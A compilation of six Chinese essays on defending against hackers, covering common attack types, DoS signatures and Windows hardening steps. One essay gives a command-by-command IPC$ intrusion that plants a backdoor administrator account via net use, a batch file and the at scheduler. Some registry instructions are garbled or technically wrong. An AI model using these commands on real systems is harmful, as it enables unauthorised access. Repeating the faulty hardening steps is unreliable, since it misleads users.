黑客防范

黑客防范（精选6篇）

黑客防范 篇1

摘要：本文查阅相关的文献资料, 首先介绍了网络黑客的攻击方法, 并根据多年的网络安全实践, 针对这些攻击方法提出了一些防范网络黑客的措施, 为保障网络安全提供了理论参考。

关键词：黑客,网络安全,防范措施

黑客 (Hacker) 一般指非法入侵其他用户电脑系统的人。黑客通过非法手段获取远程电脑系统的访问权, 篡改或破坏其他用户电脑系统内的重要数据, 窃取他人隐私文件或制造麻烦, 黑客逐渐变成了入侵者、破坏者的代名词。

1 网络黑客的攻击方法

下面将介绍一下黑客的主要攻击方法, 只有了解这些方法, 我们在对付黑客时才能有的放矢。

⑴获取口令。黑客获取口令通常有三种方法:第一种方法是通过网络非法监听获取用户的账号和口令;第二种方法为在获取用户账号名后, 通过破解软件获取用户口令;第三种方法时获取服务器上的用户口令文件的Shadow文件后, 用暴力破解程序强行获取用户口令。这三种方法中以第三种方法的对用户危害最大。

⑵放置特洛伊木马程序。特洛伊木马, 简称木马, 常常被伪装成程序文件或游戏文件引诱用户打开, 用户一旦打开这些程序, 木马就会启动被留在用户的电脑中, 用隐藏在一个开机程序中, 用户在上网时, 黑客就会通过木马控制用户的电脑, 窃取或修改用户电脑里的参数、文件等。

⑶WWW的欺骗技术。黑客能够篡改网页上的内容, 并在网页上发布一些虚假信息, 当用户访问这些虚假的网页并在网页上输入的一切账号等个人信息都将被黑客获取。

⑷电于邮件攻击。黑客用过电子邮件进行攻击的方式有两种, 一是电子邮件炸弹, 指黑客通过一个假的电子邮件地址向同一邮箱里发送无数次相同内容的垃圾邮件, 导致用户邮箱崩溃, 邮件服务器瘫痪;第二种攻击方式是电子邮件欺骗, 也就是黑客伪装成系统管理员, 给用户发送邮件, 要求用户打开指定的地址修改口令, 或者引诱用户打开邮件中带有木马或病毒的附件, 使用户电脑中毒。这两种电子邮件攻击方式都具有一定的欺骗性, 只要用户擦亮眼睛, 拒收来历不明的邮件, 就可以避免其危害。

⑸网络监听。主机能够在网络监听这种工作模式下接收到同一条物理通道上传输的本网段的全部接收或发送的信息, 假如两台相互通信的主机没有加密保护, 黑客就可以通过特定的网络监听软件, 轻易的获取通信中的所有账号口令等隐私信息, 给用户造成一定的损失。

⑹寻找系统漏洞。在一些系统或软件中经常会出现一些安全漏洞, 其中一些安全漏洞是系统或软件自身所有, 有的则是系统管理员配置错误造成的。这些安全漏洞出现后, 用户没有修复这些漏洞就上网, 黑客就会通过这些安全漏洞侵入到用户电脑中, 窃取用户的个人信息。

⑺利用账号进行攻击。一些操作系统会提供账号密码相同或无密码的缺省账户, 黑客会利用操作系统提供的命令收集用户信息, 窃取用户个人资料。只要系统管理员关闭所有的缺省账户或提醒用户给账户加密, 一般都可以防范这种攻击手段。

⑻偷取特权。黑客会利用一些木马或后门程序安全控制用户的电脑, 或者使用黑客自己编写的程序攻击用户电脑, 这些自编程序会导致缓冲区溢出, 使黑客取得用户电脑的超级权限, 进而通过远程网络实现对用户电脑的绝地控制, 危害极大。

2 网络黑客的防范措施

⑴一部分主机由于专门做Telnet、FTP等需要传送口令的重要机密信息, 所以应对这部分主机设置一个独立的网段, 防治一个网段中的一台主机一旦被黑客攻破, 背黑客装上sniffer, 导致整个网段的通信信息全部被黑客获取。必要时, 对一些非常重要的主机, 应将其装在交换机上, 这样就能防治sniffer窃取密码等隐私信息。⑵专机专用, 对一些例如运行网管或数据库进场的专用主机就应该只把这些需要运行的程序打开, 其他像send mail等漏洞较多的程序必须关闭, 防止黑客利用其漏洞入侵系统。网管网段路由器应把其访问限度要设置成最低, 弄清楚各个进程所需的端口号, 把不常用的端口关闭。⑶把向用户开发的所有主机的日志文件都定向到一个syslog server上, 集中起来便于管理。这台服务器可用一台大容量存储的NT或者UNIX主机承担, 对备份日志主机上的数据要定期做检查。⑷网管不得访问Internet, 下载资料或软件时最好用专门的电脑。⑸专门用来提供WWW、DNS及电子邮件的主机最好不要安装开发工具, 防治黑客编译程序攻击主机。⑹用户电脑最好把网络配置成“用户权限最小化”, 把一些不重要的网络服务关掉, 不在电子邮件中发送账号密码等重要的隐私信息。⑺定期给操作系统或者应用软件升级或打补丁, 安装必要的杀毒软件或防火墙等, 对主机的访问加以限制, 保护系统日志文件, 修改简单的用户口令, 不用主机设置不同的口令, 不要长时间使用同一口令。⑻定期对系统日志文件做检查备份, 制定严格的系统备份计划。⑼对系统关键的配置文件至少一个月检查一次。⑽做好黑客入侵的预防措施, 一旦发现有黑客入侵迹象, 马上打开进程记录功能, 保持内存中的进程列表, 保护重要的日志文件。必要时可断开网络连接。在服务主机不能继续服务的情况下。应该有能力从各份磁带中恢复服务到各份主机上。

参考文献

[1]尹承东.计算机网络黑客攻击机制与防范措施[J].科技资讯.2013 (17) .

[2]李振汕.黑客攻击与防范方法研究[J].网络安全技术与应用.2012 (01) .

[3]关亚丽.浅析计算机网络安全技术[J].中国科教创新导刊.2013 (05) .

浅谈防范黑客攻击的基本方法 篇2

一、查询计算机安全状态

如果想知道自己的计算机有没有被黑客控制,该怎么办呢?查看当前电脑中有哪些程序在运行?打开了哪些端口,而这些端口又与哪个网站或电脑相连?另外,还要查看对方的IP地址以及使用了哪个端口等等。具体可用DOS命令NETSTAT或软件Currports来查询。如果发现电脑存在你并没想打开的程序和端口,说明你的电脑已经被黑客控制。这时,需要采取以下措施。

二、防护计算机的具体步骤

1.用杀毒软件进行杀毒,设置防火墙

如果这样做没有效果的话,说明有些黑客已经设计出穿透防火墙的病毒或软件,或者是新的病毒。那么,就可能需要重装机器。

在重装机器之前,请先把网线断开。因为IP地址如果是固定的,很可能在重装电脑之后,还没设置好防护措施之前,黑客又提前进入。所以,等装完机子以后,防护措施完成之后,再上网。

2.进行IP欺骗,让黑客找不到IP

这样,电脑就比较安全了。最简单的方法是使用代理服务器,如软件Hide IP Platinum ,能很好地隐藏IP地址。黑客找不到你家的门,他又怎么去偷呢?

3.进行网络管理员欺骗

可以先将原来的管理员administrator改名为其他的名字,如自己姓名的汉语拼音;然后,再建一个新的管理员administrator,存入user用户组,赋给其一定的权限,而真正的管理员是用户者自己。当然,要给真实的管理员一个非常强壮的密码,建议由数字、拼音和符号组成,不要把与自己相关的信息设置为密码。这样就好像给自己的家门安上了一道非常不容易打开的锁。

4.关闭不需要的端口

例如,木马Doly 、trojan、Invisible FTP容易进入的2l端口(如果不架设FTP,建议关掉它);23端口、25端口、135端口(防止冲击波);137端口、139端口;3389端口、4899端口、8080端口等。为了防止黑客,还不影响上网,只开放80端口就可以了。如果还需要上pop,再开放l09、1l0。具体做法如下:找到桌面任务栏中的本地连接(两个计算机的那个),右键——状态——属性——TCP/IP协议——属性——高级——选项——TCP/IP筛选——属性——启用TCP/IP,筛选打勾,在TCP端口只允许80端口和110端口就可以,然后“确定”。

5.取消共享

要想彻底删除共享,就要修改注册表:

(1)禁止C盘、D盘共享。运行——输入“regedit”——打开注册表编辑器:展开[HKEY_LOCAL_MACHINEKSYSTEMCurrentControlsetservicesTcpipParamers]分支,新建一个名为EnablelCMPRedirects的键值项,将其设置为0,(0是不响应)。

(2)禁止admini共享。运行——输入“regedit”——打开注册表编辑器——[HKEYT_LOCAL_MACHlNESYSTEMCurrentControlsetServicesLanmanServerParameters]分支,新建名为AutoShareWks的键值,将其设置为0的键值项,将其设置为0。

(3)禁止lPC$共享。运行——输入“regedit”——打开注册表编辑器——展开[HKEY LOCAL_MACHlNESYSTEMCurrentControlsetControlLsa1分支,新建名为restrictanonymous的键值,将其设置为0或者l或者设置2(设置0为缺省;l为匿名无法列举本机用户列表;2为匿名用户无法连接。建议设置为“l”,这样就能禁止空用户连接)。

6.修改Windows 2000的本地安全策略

设置“本地安全策略”——“本地策略”——“选项”中的RestrictAnonymous(匿名连接的额外限制)为“不容许枚举SAM账号和共享”。

随着信息时代的发展,信息安全越来越重要,人们也越来越重视网络安全。因此,要养成良好的上网习惯,如不要随便打开某些网站,不长时间上网,密码不设置与自己有关的信启,以防造成不可挽回的后果。

浅析黑客的攻击及防范对策 篇3

在当今网络世界里,计算机系统常常受到黑客的攻击。黑客的攻击无处不在,其手段五花八门,方法也不断翻新,令人防不胜防,使得网络安全问题越来越突出。我们只有对黑客攻击的原理、攻击过程进行深入细致的了解,才能进行针对性的防范。

1 黑客攻击的主要方式

黑客对网络的攻击通常是利用“系统配置的缺陷”、“操作系统的安全漏洞”或“通信协议的安全漏洞”来进行。到目前为止,黑客的攻击方式有几千种,其中对绝大部分黑客攻击手段已经有相应的防范措施。

1.1 拒绝服务攻击

它是使用超出被攻击目标处理能力的大量数据包消耗系统可用系统、带宽资源,最后致使网络服务瘫痪的一种攻击手段。目前已知的拒绝服务攻击就有几百种,它是最基本的攻击手段,也是最难对付的攻击之一。如SYN Flood攻击、Ping Flood攻击、Land攻击、Win Nuke攻击等。

1.2 非授权访问尝试攻击

攻击者对被保护文件进行读、写或执行的尝试,也包括为获得被保护访问权限所做的尝试。

1.3 预探测攻击

在连续的非授权访问尝试过程中,攻击者为了获得网络内部的信息及网络周围的信息,通常使用这种攻击尝试。如SATAN扫描、端口扫描、IP半途扫描等。

1.4 网络嗅探攻击

就是使网络接口接收不属于本主机的数据。计算机网络通常建立在共享信道上,其数据报头包含目的主机的硬件地址,只有硬件地址匹配的机器才会接收该数据包。一个能接收所有数据包的机器被称为杂错节点,一旦被黑客在杂错节点上嗅探到,用户就可能会遭到损害。

1.5 源IP地址欺骗攻击

许多应用程序认为若数据包可以使其自身沿着路由到达目的地,并且应答包也可回到源地,那么源IP地址一定是有效的,而这正是使源IP地址欺骗攻击成为可能。

1.6 源路由欺骗攻击

在通常情况下,信息包从起点到终点所走的路是由位于此两点间的路由器决定的,数据包本身只知道去往何处,而不知道该如何去。源路由可使信息包的发送者将此数据包要经过的路径写在数据包里,使数据包循着一个对方不可预料的路径到达目的主机。

2 对黑客攻击的防范对策

2.1 Land攻击(拒绝服务攻击)对策

(1)攻击特征。用于Land攻击的数据包中的源地址和目标地址是相同的,因为当操作系统接收到这类数据包时,不知道该如何处理通信源地址和目的地址相同的情况,或者循环发送和接收该数据包,消耗大量的系统资源,这样就有可能造成系统崩溃或死机等现象。

(2)检测方法。判断网络数据包的源地址和目标地址是否相同。

(3)反攻击方法。适当配置防火墙设备或过滤路由器的过滤规则就可以防止这种攻击行为(一般是丢弃该数据包),并对这种攻击进行审计(记录事件发生的时间、源主机和目标主机的MAC地址和IP地址)。

2.2 TCP SYN攻击(拒绝服务攻击)对策

(1)攻击特征。它是利用TCP客户机与服务器之间三次握手过程的缺陷来进行的。攻击者通过伪造源IP地址向被攻击者发送大量的SYN数据包,当被攻击主机接收到大量的SYN数据包时,需要使用大量的缓存来处理这些连接,并将SYN ACK数据包发送回错误的IP地址,并一直等待ACK数据包的回应,最终导致缓存用完,不能再处理其它合法的SYN连接。

(2)检测方法。检查单位时间内收到的SYN连接是否超过系统的设定。

(3)反攻击方法。当接收到大量的SYN数据包时,通知防火墙阻断连接请求或丢弃这些数据包,并进行系统审计。

2.3 Ping Of Death攻击(拒绝服务攻击)对策

(1)攻击特征。该攻击数据包大于65535个字节。由于部分操作系统接收到长度大于65535字节的数据包时,就会造成内存溢出、系统崩溃、重启、内核失败等后果,从而达到攻击的目的。

(2)检测方法。判断数据包的大小是否大于65535个字节。

(3)反攻击方法。使用新的补丁程序,当收到大于65535个字节的数据包时,丢弃该数据包,并进行系统审计。

2.4 Win Nuke攻击(拒绝服务攻击)对策

(1)攻击特征。攻击目标端口,被攻击的目标端口通常是139、138、137、113、53,而且URG位设为“1”,即紧急模式。

(2)检测方法。判断数据包目标端口是否为139、138、137等,并判断URG位是否为“1”。

(3)反攻击方法。适当配置防火墙设备或过滤路由器就可以防止这种攻击手段(丢弃该数据包),并对这种攻击进行审计。

2.5 Teardrop攻击(拒绝服务攻击)对策

(1)特征。Teardrop是基于UDP的病态分片数据包的攻击方法,其工作原理是向被攻击者发送多个分片的IP包,某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。

(2)检测方法。对接收到的分片数据包进行分析,计算数据包的片偏移量是否有误。

(3)反攻击方法。添加系统补丁程序,丢弃收到的病态分片数据包并对这种攻击进行审计。

要彻底杜绝拒绝服务攻击,最好的办法是追根溯源去找到正在进行攻击的机器和攻击者。在其进行攻击的时候,根据路由器的信息和攻击数据包的特征,采用逐级回溯的方法来查找其攻击源头。

2.6 TCP/UDP端口扫描(预探测攻击)对策

(1)攻击特征。对被攻击主机的不同端口发送TCP或UDP连接请求,探测被攻击对象运行的服务类型。

(2)检测方法。统计外界对系统端口的连接请求,特别是对21、23、25、53、80、8000、8080等以外的非常用端口的连接请求。

(3)反攻击方法。当收到多个TCP/UDP数据包对异常端口的连接请求时,通知防火墙阻断连接请求,并对攻击者的IP地址和MAC地址进行审计。

2.7 源IP地址欺骗对策

(1)阻止这类攻击的有效办法就是抛弃基于地址的信任,放弃以地址为基础的验证。

(2)使用加密方法。在包发送到网络之前,我们可以对它进行加密,使数据保持完整性、真实性和保密性。

(3)进行包过滤。可以配置路由器使其能够拒绝网络外部与本网内具有相同IP地址的连接请求。

2.8 网络嗅探攻击对策

(1)网络分段。一个网络段包括一组共享低层设备和线路的机器,这样可以对数据流进行限制,从而达到防止嗅探的目的。

(2)加密。既可以对数据流中的部分重要信息进行加密,也可对应用层加密。

(3)一次性口令技术。口令并不在网络上传输而是在两端进行字符串匹配,客户端利用从服务器上得到的Challenge和自身的口令计算出一个新字符串并将之返回给服务器。在服务器上利用比较算法进行匹配,如果匹配,连接就允许建立,所有的Challenge和字符串都只使用一次。

3 结束语

未来的竞争是信息竞争,而网络信息是竞争的重要组成部分。其实质是人与人的对抗,具体体现在安全策略与攻击策略的交锋上。为了不断增强信息系统的安全防御能力,必须充分理解系统内核及网络协议的实现,真正做到洞察对方网络系统的“细枝末节”,同时应该熟知针对各种攻击手段的预防对策,这样才能尽最大可能保证网络的安全。

参考文献

[1]李俊宇.信息安全技术基础[M].北京:冶金工业出版社,2004.

浅谈黑客的入侵与防范 篇4

随着时间的变化, 黑客攻击的动机不再像以前那样简单了:只是对编程感兴趣, 或是为了发现系统漏洞。现在, 黑客攻击的动机越来越多样化, 主要有以下几种:⑴贪心。因为贪心而偷窃或者敲诈, 有了这种动机, 才引发许多金融案件。⑵恶作剧。计算机程序员搞的一些恶作剧, 是黑客的老传统。⑶名声。有些人为显露其计算机经验与才智, 以便证明自己的能力, 获得名气。⑷报复/宿怨。解雇、受批评或者被降级的雇员, 或者其他认为自己受到不公正待遇的人, 为了报复而进行攻击。⑸无知/好奇。有些人拿到了一些攻击工具, 因为好奇而使用, 以至于破坏了信息还不知道。⑹仇恨。国家和民族原因。⑺间谍。政治和军事谍报工作。⑻商业。商业竞争, 商业间谍。

2 网络攻击的步骤

黑客技术是网络安全技术的一部分, 主要是看用这些技术做什么, 用来破坏其他人的系统就是黑客技术, 用于安全维护就是网络安全技术。学习这些技术就是要对网络安全有更深的理解, 从更深的层次提高网络安全。

进行网络攻击并不是件简单的事情, 它是一项复杂及步骤性很强的工作。一般的攻击都分为3个阶段, 即攻击的准备阶段、攻击的实施阶段、攻击的善后阶段。

攻击的准备阶段

⑴在攻击的准备阶段重点做3件事情:确定攻击目的、收集目标信息以及准备攻击工具。 (1) 确定攻击目的:首先确定攻击希望达到的效果, 这样才能做下一步工作。 (2) 收集目标信息:在获取了目标主机及其所在网络的类型后, 还需进一步获取有关信息, 如目标主机的IP地址、操作系统的类型和版本、系统管理人员的邮件地址等, 根据这些信息进行分析, 可以得到被攻击系统中可能存在的漏洞。 (3) 准备攻击工具:收集或编写适当的工具, 并在操作系统分析的基础上, 对工具进行评估, 判断有哪些漏洞和区域没有覆盖到。

⑵以一个常见的网络入侵为例子

IPC$入侵方法

1) IPC$连接的建立与断开

(1) 建立IPC$连接。假设192.168.1.104主机的用户名为abc, 密码为123456, 则输入以下命令。

net use192.168.1.104IPC$"123456"/user:"abc"

若要建立空连接, 则输入以下命令。

net use192.168.1.104IPC$""/user:""

(2) 建立网络驱动器, 输入以下命令。

net use z:192.168.1.104C$

若要删除网络驱动器, 输入以下命令。

net use z:/delete

(3) 断开IPC$连接。输入以下命令。

net use192.168.1.104IPC$/delete

2) 建立后门账号

(1) 编写批处理文件。在“记事本”中输入“net user sysback 123456/add”和“net localgroup administrators sysback/add”命令, 另存为hack.bat文件。 (2) 与目标主机建立IPC$连接。 (3) 复制文件到目标主机。输入“copy hack.bat192.168.1.104C$”命令, 把hack.bat文件复制到目标主机的C盘中。 (4) 通过计划任务使远程主机执行hack.bat文件, 输入“net time192.168.1.104”命令, 查看目标系统时间。 (5) 假设目标系统的时间为22:30, 则可输入“at192.168.1.10422:35 c:hack.bat”命令, 计划任务添加完毕后, 使用“net use*/delete”命令, 断开IPC$连接。 (6) 验证账号是否成功建立。等一段时间后, 估计远程主机已经执行了hack.bat文件。通过sysback账号建立IPC$连接。若连接成功, 说明sysback后门账号已经成功建立。

3 网络攻击的防范策略, 以IPC$入侵的防范为例:

IPC$在为管理员提供了方便的同时, 也留下了严重的安全隐患, 防范IPC$入侵的方法有以下3种。

(1) 删除默认共享。 (2) 禁止利用空连接进行用户名枚举攻击。在注册表中, 把HKEY_LOCAL_MACHINESYSTEMCurrent Control SetControlLsa中的restrictanonymous子键的值改为1。修改完毕后重新启动计算机, 这样便禁止了利用空连接进行用户名枚举攻击 (nbtstat–a IP) 。不过要说明的是, 这种方法并不能禁止建立空连接。 (3) 关闭Server服务。Server服务是IPC$和默认共享所依赖的服务, 如果关闭Server服务, IPC$和默认共享便不存在, 但同时服务器也丧失了其他一些服务, 因此该方法只适合个人计算机使用。 (4) 屏蔽139、445端口。没有这两个端口的支持, 是无法建立IPC$连接的, 因此屏蔽139、445端口同样可以阻止IPC$入侵。

4 网络入侵证据的收集与分析

从事网络安全工作的人都知道, 黑客在入侵之后都会想方设法抹去自己在受害系统上的活动记录, 目的是逃脱法律的制裁。而许多企业也不上报网络犯罪, 其原因在于害怕这样做会对业务运作或企业商誉造成负面影响, 他们担心这样做会让业务运作因此失序, 更重要的是收集犯罪证据有一定困难。因此, CIO (Chief Information Office, 首席信息官) 们应该在应急响应系统的建立中加入计算机犯罪证据的收集与分析环节。

计算机取证又称为数字取证或电子取证, 是指对计算机入侵、破坏、欺诈、攻击等犯罪行为利用计算机软硬件技术, 按照符合法律规范的方式进行证据获取、保存、分析和出示的过程。从技术上, 计算机取证是一个对受侵计算机系统进行扫描和破解, 以及对整个入侵事件进行重建的过程。

4.1 计算机取证包括物理证据获取和信息发现两个阶段

物理证据获取是指调查人员到计算机犯罪或入侵的现场, 寻找并扣留相关的计算机硬件;信息发现是指从原始数据 (包括文件, 日志等) 中寻找可以用来证明或者反驳的证据, 即电子证据。除了那些刚入门的“毛小子”之外, 计算机犯罪分子也会在作案前周密部署、作案后消除蛛丝马迹。他们更改、删除目标主机中的日志文件, 清理自己的工具软件, 或利用反取证工具来破坏侦察人员的取证。

4.2 物理取证是核心任务

在任何情况下, 调查者都应牢记以下5点: (1) 不要改变原始记录。 (2) 不要在作为证据的计算机上执行无关的操作。 (3) 不要给犯罪者销毁证据的机会。 (4) 详细记录所有的取证活动。 (5) 妥善保存得到的物证。

摘要：黑客是“Hacker”的音译, 源于动词Hack, 在美国麻省理工学院校园俚语中是“恶作剧”的意思, 尤其是那些技术高明的恶作剧, 确实, 早期的计算机黑客个个都是编程高手。因此, “黑客”是人们对那些编程高手、迷恋计算机代码的程序设计人员的称谓。真正的黑客有自己独特的文化和精神, 并不破坏其他人的系统, 他们崇拜技术, 对计算机系统的最大潜力进行智力上的自由探索。

关键词：Hacker,网络,防范

参考文献

[1]陈忠平.《网络安全》.清华大学出版社, 2011年.

[2] (美) 格里格瑞斯, 等, 著.《网络安全:现状与展望》.科学出版社, 2010年.

网络黑金时代黑客攻击的有效防范 篇5

一、网络黑金时代的现状

在计算机网络如此发达的今天, 网络黑客愈演愈烈, 而“磁碟机”病毒也正是在这种刻意低调的伪装下, 伺机窃取用户的隐私敏感信息, 包括游戏账号、网银、网上证券交易等账号密码, 稍不留神, 人们就会跌入被人设计好的网络陷阱, 付出沉重的代价。

“2008年爆发的‘磁碟机’病毒, 与‘熊猫烧香’病毒相比, 绝对是青出于蓝而胜于蓝。它非常狡猾, 在反攻杀毒软件能力、传播能力、自我保护能力和隐藏能力、病毒变种和自我更新速度、破坏性等方面远远超过了以往的‘熊猫烧香’。”“据国家计算机网络应急处理中心估计, 目前病毒的‘黑色产业链’年产值已超过2.38亿元人民币, 造成的损失则超过76亿元。”

在利润的驱使下, 想利用病毒获取利益的人逐渐地聚集到一起, 形成了一条产销分工明确的灰色产业链。金山毒霸北京技术部技术总监孙国军说, “灰鸽子的背后就有一个制造、贩卖、销售病毒的‘传销’帝国, 一些人利用它大量发展‘肉鸡’, 然后贩卖出去获取经济利益。”

二、黑客攻击不断升级的原因分析

(一) 非法牟取利益。

据了解, “熊猫烧香”的程序设计者李俊, 每天收入近万元, 被警方抓获后, 承认自己获利近千万元。据中国互联网安全最高机构——国家计算机网络应急技术处理协调中心的监测数据显示, 目前中国的互联网世界中, 有5个僵尸网络操控的“肉鸡”规模超过10万台, 个别僵尸网络能达到30万台规模。这些僵尸网络可以被租借、买卖, 黑客们每年可以有上百万元收入。由此可见, 这些真实的案例足以证明黑客们疯狂的、日以继夜的、争分夺秒的制造新病毒, 潜藏着一个共同目的——牟取暴利。非法获取利益是黑客攻击不断升级客观存在的根本因素。

(二) 有力制裁黑客行为的法律缺失。

按照我国目前的《计算机信息网络国际联网安全保护管理办法》, 制造和传播病毒属违法行为, 但对于木马、黑客程序等并没有清晰的界定, 因为它们本身只是一个工具, 至于使用者拿它们去干坏事还是干好事, 无法控制。这也是木马程序制造者敢于利用网络公开叫卖、大发不义之财的根本原因。所以, 立法斩黑迫在眉睫。

(三) 网络使用者的自我安全保护意识不足。

在暴利的推动下, 病毒的发展势头空前强大, 计算机病毒反攻杀毒软件的能力、自我保护能力、隐藏能力还有变种速度可能导致杀毒软件永远没有办法清除病毒。所以, 提高网络安全意识是避免被病毒肆虐的最佳途径。

三、黑客攻击的有效防范

我们认为, 对付网络信息时代的攻击, 最好的武器是训练有素的人, 而不是技术。网络地下产业链发展至今, 已经具有了组织化、公开化和规模化的流水性作业程序。因此, 任何连接到Internet上的关键任务系统必须清楚地了解所面临的问题, 并知道采取何种措施使被成功攻击的机会达到最小。在此, 本文对如何减少被黑客攻击提出以下几项措施:

第一, 拒绝网上“裸奔”。所谓网上“裸奔”, 就是计算机系统没装杀毒软件或者防火墙, 或者虽然装了杀毒软件但长期不升级病毒库, 或者装多个杀毒软件和多重防火墙。一般来说, 装上杀毒软件和防火墙较为妥当。装多个, 则太杞人忧天了。因为软件之间会互相冲突, 导致系统不稳定、速度变得像蜗牛一样慢, 从而大大影响了计算机的速度。

第二, 培养及时更新计算机系统的习惯。调查发现, 有65%的计算机用户没有及时更新计算机系统, 没有打补丁的习惯;有30%的用户从来没有为自己的计算机打过补丁。只有5%的一些计算机爱好者, 会每天坚持完善自己的计算机系统。“熊猫烧香”病毒之所以造成了非常大的危害性, 其根本原因就在于社会上的计算机系统存在着不安全设置和漏洞。如果我们的安全意识提高, 及时关注和安装最新的补丁, 不断合理设置计算机系统, 就会大大地降低被攻击的机率。

第三, 设计有效完善的站点。站点越完善, 站内网络的运行状况就会越好。在理想情况下, 公司不仅要有多条与Internet的连接, 最好有不同的地理区域连接。因为网络服务的位置越分散, IP地址越分散, 攻击同时寻找与定位所有计算机的难度就越大。这样当问题发生时, 所有的通信都可以被重新路由。

第四, 限制带宽。当拒绝服务攻击发生时, 针对单个协议的攻击会耗尽公司的带宽, 以致拒绝对合法用户的服务。限制基于协议的带宽就成为一种非常有效的防范措施。例如, 端口25只能使用20%的带宽, 端口80只能使用50%的带宽。但是, 我们需要知道, 所有这些解决方案都是不完善的, 都存在着被攻克的可能, 因此, 能与黑客攻击相匹敌的惟一方法就是建立多种防御机制来保护网络。

第五, 运行尽可能少的服务。运行尽可能少的服务可以减少被成功攻击的机会。如果一台计算机开了30个端口, 这使得攻击者可以在很大的范围内尝试对每个端口进行不同的攻击。相反, 如果系统只开了两、三个端口, 这就限制了攻击者攻击站点的攻击类型。

第六, 只允许必要的通信。这一防御机制与上一个标准“运行尽可能少的服务”很相似, 不过它侧重于周边环境, 主要是防火墙和路由器。关键是不仅要对系统实施最少权限原则, 对网络也要实施最少权限原则。确保防火墙只允许必要的通信出入网络。许多人只过滤进入通信, 而向外的通信不采取任何措施。其实, 这两种通信都应该过滤。

第七, 封锁敌意IP地址。当一个公司知道自己受到攻击时, 应该马上确定发起攻击的IP地址, 并在其外部路由器上封锁此IP地址。这样的问题是, 即使在外部路由器上封锁了这些IP地址, 路由器仍然会因为数据量太多而拥塞, 导致合法用户被拒绝对其他系统或网络的访问。因此, 一旦公司受到攻击应立刻通知其ISP和上游提供商封锁敌意数据包。因为ISP拥有较大的带宽和多点访问, 如果它们封锁了敌意通信, 仍然可以保持合法用户的通信, 也可以恢复遭受攻击公司的连接。

第八, 尽量避免个人资料的泄露。QQ、MSN、论坛账号等等是被广泛应用的通讯工具, 黑客团伙盗取QQ号的动机是为了里面的好友信息, 一旦他们掌握了这些信息, 便可以向你的朋友下手, 通过诈骗、勒索、盗窃等等的手段来获得经济利益。所以, 登陆自己的账号时, 尽量不要选“自动登陆”, 不要在论坛个人资料里选择“公开邮箱”, 也不要在QQ和MSN上公开透露个人的隐私资料信息, 更不要相信您的邮箱里有关于套取你机密资料的邮件, 特别是那些向你索取银行账号和密码的邮件, 如果有来历不明的可疑邮件, 不要打开, 一经发现, 立刻删除。在办公室上网的尤其应该如此。

总而言之, 从来就没有刀枪不入的盔甲, 当代也没有天衣无缝的计算机系统, 也不存在完美的杀毒软件, 最好的杀毒方法就是把病毒抵于门外。如果广大网民都以身作则, 积极提高网络的自我保护意识, 那么黑客攻击和危害就会大大减少, 甚至无机可乘了。

注释

1[1]林华.重拳惊曝黑客产业链条[J].高科技与产业化, 2008, 1

浅谈防范黑客入侵攻击的主要方法 篇6

黑客网络的攻击方式是多种多样的, 一般来讲, 总是利用“系统配置的缺陷”, “操作系统的安全漏洞”或“通信协议的安全漏洞”来进行的。到目前为止, 已经发现的攻击方式超过2000种, 这些攻击大概可以划分为以下六类:

1、拒绝服务攻击

一般情况下, 拒绝服务攻击是通过使被攻击对象 (通常是工作站或重要服务器) 的系统关键资源过载, 从而使被攻击对象停止部分或全部服务。目前已知的拒绝服务攻击就有几百种, 它是最基本的入侵手段, 也是最难对付的入侵攻击之一, 典型示例有SYN Flood攻击、Ping Flood攻击、Win Nuke攻击等。

2、非授权访问尝试

非授权访问尝试是攻击者对被保护文件进行读、写或执行的尝试, 也包括为获得被保护访问权限所做的尝试。

3、预探测攻击

在连续的非授权访问尝试过程中, 攻击者为了获得网络内部的信息及网络周围的信息, 通常使用这种攻击尝试, 典型示例包括SATAN扫描、端口扫描和IP半途扫描等。

4、可疑活动

可以活动是通常定义的“标准”网络通信范畴之外的活动, 也可以指网络上不希望有的活动, 如IP Unknown Protocol和Duplicate IP Address事件等。

5、协议解码

协议解码可用于以上任何一种非期望的方法中, 网络或安全管理员需要进行解码工作, 并获得相应的结果, 解码后的协议信息可能表明期望的活动, 如FIU User和Portmapper Proxy等解码方式。

6、系统代理攻击

这种攻击通常是针对单个主机发起的, 而并非整个网络, 通过Real Secure系统代理可以对它们进行监视。

二、防范黑客攻击的主要方法

了解了黑客的攻击方式, 除了硬件上要做好防范外, 还要自己懂得使用一些简单的网络病毒防范程序, 合理使用网络安全程序, 能在一定基础上降低黑客侵入系统的几率。通常的技术手段如下:

1、关闭“文件和打印共享”

随着办公业务的不断增加, 共享一些资料成为一种常用的办公手段, 许多办公室共用一台打印机的现象也非常普遍, 这种使用环境很容易让一些不安全的电脑病毒程序, 利用此功能, 在电脑之间不断传输与感染, 甚至一些黑客也利用此漏洞进行一些窃取密码与重要文件的活动, 为了杜绝此类现象的发生, 最有效的办法就是确保共享功能及时关闭, 具体操作办法就是用鼠标右击“网络邻居”, 选择“属性”, 然后单击“文件和打印共享”按钮, 将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。

2、关闭系统来宾账户

Guest帐户指计算机操作系统分配的来宾帐户, 用这个账户可以进入计算机系统, 但是访问会受到一些限制, 常用的浏览查找功能可以实现, 一些管理功能此账户是禁止操作的, 不过一些病毒也可以利用此账户, 登入计算机系统, 安放后门程序, 伺机窃取复制重要数据与密码, 禁用或彻底删除Guest帐户是最好的办法。

3、严禁创建空连接

在一般的情况下, 所有的计算机终端用户都可以进行空连接连到系统服务器, 从而进行账号密码的反复比对进行破解。所以对于网络服务器系统必须严禁建立空连接。一般可以通过修改系统注册表实现:

打开注册表“HKEY_LOCAL_MACHINESystemCurrentControlSetC o n t r o lL S A”, 将D W O R D值“RestrictAnonymous”的键值改为“1”即可。

4、将IP地址进行隐藏与伪装

黑客经常利用一些网络探测技术来查看我们的主机信息, 主要目的就是得到网络中主机的IP地址。隐藏IP地址的主要方法是使用代理服务器。代理服务器的原理是在客户机和远程服务器之间架设一个“中转站”, 当客户机向远程服务器提出服务要求后, 代理服务器首先截取用户的请求, 然后代理服务器将服务请求转交远程服务器, 从而实现客户机和远程服务器之间的联系。很显然, 使用代理服务器后, 其它用户只能探测到代理服务器的IP地址而不是用户的IP地址, 这就实现了隐藏用户IP地址的目的, 保障了用户上网安全。

5、无用的系统端口要进行屏蔽

一般情况, 网络黑客在需要系统漏洞时, 通常会网络中大量扫描开放的计算机端口, 如果安装了端口监视程序 (比如Netwatch) , 该监视程序则会有警告提示。如果遇到这种入侵, 可用工具软件关闭用不到的端口。

6、建立防护体系, 安装专业查杀防护软件

